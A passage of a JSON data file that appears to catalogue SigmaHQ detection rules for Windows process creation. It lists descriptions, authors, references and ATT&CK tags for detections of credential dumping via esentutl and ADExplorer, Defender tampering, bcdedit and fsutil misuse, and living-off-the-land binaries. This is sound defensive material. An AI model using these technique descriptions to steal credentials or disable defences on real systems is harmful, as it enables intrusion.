"related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "value": "CreateDump Process Dump" }, { "description": "Detects uncommon child process of Setres.EXE.\nSetres.EXE is a Windows server only process and tool that can be used to set the screen resolution.\nIt can potentially be abused in order to launch any arbitrary file with a name containing the word \"choice\" from the current execution path.\n", "meta": { "author": "@gott_cyber, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-11", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_setres_uncommon_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://twitter.com/0gtweet/status/1583356502340870144", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setres_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "value": "Uncommon Child Process Of Setres.EXE" }, { "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and 
delete the driver files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-29", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_powertool.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "value": "HackTool - PowerTool Execution" }, { "description": "Detects nltest commands that can be used for information discovery", "meta": { "author": "Craig Young, oscd.community, Georg Lauenstein", "creation_date": "2021-07-24", "falsepositive": [ "Legitimate administration use but user and host must be investigated" ], "filename": "proc_creation_win_nltest_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", 
"https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ "attack.discovery", "attack.t1016", "attack.t1482" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "value": "Potential Recon Activity Via Nltest.EXE" }, { "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", "meta": { "author": "Avneet Singh @v3t0_, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_tracker.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.001" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", "value": "Potential DLL Injection Or Execution Using Tracker.exe" }, { "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of 
the active directory database to a suspicious directory.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ef61af62-bc74-4f58-b49b-626448227652", "value": "Suspicious Active Directory Database Snapshot Via ADExplorer" }, { "description": "Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.\n", "meta": { "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-11-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_system_exe_anomaly.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/GelosSnake/status/934900723426439170", "https://asec.ahnlab.com/en/39828/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "value": "System File Execution Location Anomaly" }, { "description": "Detects the import of the specified file to the registry with regedit.exe.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate import of keys", "Evernote" ], "filename": "proc_creation_win_regedit_import_keys.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", "value": "Imports Registry Key From a File" }, { "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-11", "falsepositive": [ "Administrative activity", "Software installation" ], "filename": "proc_creation_win_schtasks_creation_temp_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "value": "Suspicious Scheduled Task Creation Involving Temp Folder" }, { "description": "Detects a tscon.exe start as LOCAL SYSTEM", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_tscon_localsystem.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9847f263-4a81-424f-970c-875dab15b79b", "value": "Suspicious TSCON Start as SYSTEM" }, { "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", "meta": { "author": "Ecco, E.M. 
Anhaus, oscd.community", "creation_date": "2019-09-26", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_fsutil_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt", "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1070", "attack.t1485" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "add64136-62e5-48ea-807e-88638d02df1e", "value": "Fsutil Suspicious Invocation" }, { "description": "Detects execution of \"reg.exe\" to disable security services such as Windows Defender.", "meta": { "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "creation_date": "2021-07-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_disable_sec_services.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", 
"https://vms.drweb.fr/virus/?i=24144899", "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", "value": "Security Service Disabled Via Reg.EXE" }, { "description": "Conti recommendation to its affiliates to use esentutl to access a dumped NTDS file. Trickbot also uses this utility to get MSEdge info via its module pwgrab.", "meta": { "author": "sam0x90", "creation_date": "2021-08-06", "falsepositive": [ "To be determined" ], "filename": "proc_creation_win_esentutl_params.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://attack.mitre.org/software/S0404/", "https://twitter.com/vxunderground/status/1423336151860002816", "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "value": "Esentutl Gather Credentials" }, { "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", "meta": { "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "creation_date": "2021-07-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_spoolsv_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.t1203", "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "value": "Suspicious Spool Service Child Process" }, { "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", "meta": { "author": "frack113", "creation_date": "2021-07-12", "falsepositive": [ "App-V clients" ], "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": 
[ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" }, { "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "value": "Potential PowerShell Execution Policy Tampering - ProcCreation" }, { "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", "meta": { "author": "@neu5ron", "creation_date": "2019-02-07", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_bcdedit_susp_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", "https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.persistence", "attack.t1542.003" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1b7b1806-7746-41a1-a35d-e48dae25ddba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", "value": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE" }, { "description": "Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).\nProcess Hacker is a tool to view and manipulate processes, kernel options and other low level options.\nThreat actors abused older vulnerable versions to manipulate system processes.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-10", "falsepositive": [ "While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis" ], "filename": "proc_creation_win_pua_process_hacker.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://processhacker.sourceforge.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml" ], "tags": [ "attack.defense-evasion", "attack.discovery", "attack.persistence", "attack.privilege-escalation", "attack.t1622", "attack.t1564", "attack.t1543" ] }, "related": [ { "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", "value": "PUA - Process Hacker Execution" }, { "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", "meta": { "author": "frack113", "creation_date": "2022-03-02", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "value": "Fsutil Behavior Set SymlinkEvaluation" }, { "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "creation_date": "2022-06-21", "falsepositive": [ "Legitimate usage of \".diagcab\" files" ], "filename": "proc_creation_win_msdt_susp_cab_options.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://twitter.com/nas_bench/status/1537896324837781506", 
"https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "value": "Suspicious Cabinet File Execution Via Msdt.EXE" }, { "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022-09-02", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_frp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://asec.ahnlab.com/en/38156/", "https://github.com/fatedier/frp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_frp.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", "value": "PUA - Fast Reverse Proxy (FRP) Execution" }, { "description": "Detects potentially suspicious child processes of Wscript/Cscript. 
These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.\nMalware such as Pikabot and Qakbot were seen using similar techniques as well as many others.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')", "creation_date": "2023-05-15", "falsepositive": [ "Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly." ], "filename": "proc_creation_win_wscript_cscript_susp_child_processes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt", "Internal Research", "https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b6676963-0353-4f88-90f5-36c20d443c6a", "value": "Cscript/Wscript Potentially Suspicious Child Process" }, { "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", "meta": { "author": "Sreeman", "creation_date": "2020-09-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", "value": "Potential Persistence Via Microsoft Compatibility Appraiser" }, { "description": "Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "proc_creation_win_powershell_remove_mppreference.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "value": "Tamper Windows Defender Remove-MpPreference" }, { "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.\nThis detection assumes that PowerShell commands are passed via the CommandLine.\n", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-08-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_powershell_execution_via_dll.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_execution_via_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", "value": "Potential PowerShell Execution Via DLL" }, { "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", "meta": { "author": "frack113", "creation_date": "2022-01-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_rmdir_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41ca393d-538c-408a-ac27-cf1e038be80c", "value": "Directory Removal Via Rmdir" }, { "description": "Detects the execution of the PurpleSharp adversary simulation tool", "meta": { "author": "Florian Roth (Nextron 
Systems)", "creation_date": "2021-06-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_purplesharp_indicators.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/mvelazc0/PurpleSharp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml" ], "tags": [ "attack.t1587", "attack.resource-development" ] }, "related": [ { "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "value": "HackTool - PurpleSharp Execution" }, { "description": "Detects execution of \"findstr\" to search for common names of security tools. Attackers often pipe the results of recon commands such as \"tasklist\" or \"whoami\" to \"findstr\" in order to filter out the results.\nThis detection focuses on the keywords that the attacker might use as a filter.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-10-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_security_keyword_lookup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/", 